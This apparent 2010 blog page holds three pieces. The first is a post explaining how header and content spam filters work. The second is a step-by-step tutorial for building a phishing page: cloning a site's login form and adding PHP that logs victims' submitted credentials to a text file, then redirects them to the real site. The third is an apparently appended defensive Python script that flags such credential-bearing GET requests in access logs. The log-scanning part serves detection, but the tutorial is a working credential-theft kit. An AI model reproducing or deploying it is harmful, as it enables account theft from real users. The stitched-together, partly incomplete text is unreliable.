Friday 13 August 2010

How do Email Spam Filters Work

If you work with email on a daily basis, you are most likely using a spam filter to ease the job of sifting through a large number of spam emails every day. Spam filters make that job a lot simpler by automatically filtering out the junk; without them it would be almost impossible to sort manually through the junk emails that arrive in the millions each day. However, it is often necessary to have a basic knowledge of how spam filters work and on what basis they flag an email as spam.

How Do Spam Filters Work?

There are different kinds of spam filters:

Header Spam Filters

Header spam filters work by examining the header information of an email message to check whether it appears to have been forged. The header of every email contains information about the origin of the email, i.e., the incoming email ID and usually the IP address (server address) of the sender. Spammers often forge the header to insert a false sender ID and IP address, making them difficult to trace. Thus, if an email is suspected of having a forged header, or if the same message is found to have been sent to multiple recipients, many filters will most likely treat it as spam. This method of spam filtering is often quite effective; however, it may occasionally cause some requested newsletters to be misdirected into the spam folder.

Content Spam Filters

Content spam filters are among the most effective and widely used filters for combating spam emails. They use a sophisticated algorithm with a set of pre-defined rules to determine whether a given email is spam. They work by scanning the entire text/body of the email for specific words and patterns that make it resemble a typical spam message. Most content spam filters work on the following criteria and check:

1. If the message talks a lot about money matters. Commonly suspected words include: lottery, discount, offer, bank account, money back guarantee etc.

2. If the message contains adult terms like: viagra, pills, bed, drugs, hot and so on.

3. If there is any sort of urgency. Most spam emails convey urgency by using terms such as hurry, offer valid till etc.

4. If the message contains a single large image with little or no text, it is often considered spam by many filters.

Thursday 12 August 2010

FAKE LOGIN PAGE

I’ve posted about phishing and the techniques attackers use to spread their phishing sites. Now, let’s look at how they create these phishing pages in the first place with step-by-step instructions. Knowledge of PHP and HTML will be very useful for creating fake login pages. By reading the rest of this post, you are agreeing to our DISCLAIMER.

  1. Select a target website and navigate to their login page.
  2. Save the whole page by going to File->Save Page As.. (I’m doing this in Firefox and so should you.)
  3. You will now have an HTML file and a folder full of images and maybe some JavaScript files. Rename the HTML file to index.html and create another file called list.txt. This text file will hold the login credentials of the victims.
  4. Create a PHP file and name it “phish.php”.
  5. Paste the following code into the previously made PHP file. This code is what takes the login details and stores it in the file “list.txt” and then redirects to the real website. This way the user will think he put in the wrong login information and will succeed the second time since it is now the real website.
    Header("Location: http://www.RealSite.com");
    

    $handle = fopen("list.txt", "a");

    foreach($_GET as $variable => $value) {

    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }fwrite($handle, "\r\n");

    fclose($handle);
    exit;
    ?>

  6. Now we must point the login form in the HTML file to the PHP file. Locate the form code in the HTML file and change the action link to the PHP file and the method type to GET so that the submitted information is passed through the URL. The HTML code should start with something like this:

  7. Once everything is complete, upload the files to a free webhost that supports PHP.
  8. That’s it! You’ve just created a phishing page.

UPDATE: If you are using WAMP to test this script, make sure that when you are pointing the index page to the phish page you point it to localhost://folder-its-in/phish.php so that the php file actually gets parsed.
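Seen from the defender's side, the design described above leaves a clear trace: the submitted credentials travel in the URL query string of a GET request, and the server answers with a redirect. The following is an added example, not code from the original post, that a hosting abuse team or proxy operator could run over access logs to flag such requests; the combined log format, the parameter names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed parameter names that commonly carry secrets; tune for your environment.
SECRET_KEYS = {"pass", "passwd", "password", "pwd", "passcode", "pin"}

# Apache/nginx "combined" access-log line (the format is an assumption about your logs).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def find_credential_gets(lines):
    """Flag GET requests whose query string carries a secret-like parameter.
    Only parameter names are reported; the values are never copied out."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        parts = urlsplit(m["target"])
        keys = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
        hits = sorted({k for k in keys if k.lower() in SECRET_KEYS})
        if not hits:
            continue
        findings.append({
            "line": lineno,
            "client": m["ip"],
            "path": parts.path,
            "params": hits,
            # A 3xx answer matches the "collect, then redirect to the real site" pattern.
            "redirected": m["status"].startswith("3"),
        })
    return findings

# Constructed sample log lines (documentation IP ranges, made-up paths).
SAMPLE = [
    '198.51.100.7 - - [12/Aug/2010:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Aug/2010:10:01:40 +0000] "GET /collect.php?email=a%40example.com&pass=REDACTED HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Aug/2010:10:05:11 +0000] "POST /login HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Aug/2010:10:06:00 +0000] "GET /search?q=password+reset HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_credential_gets(SAMPLE):
        print(finding)
```

Matching on parameter names rather than values keeps ordinary searches such as `q=password+reset` out of the results, and the same hits show where secrets are already sitting in log files and browser history.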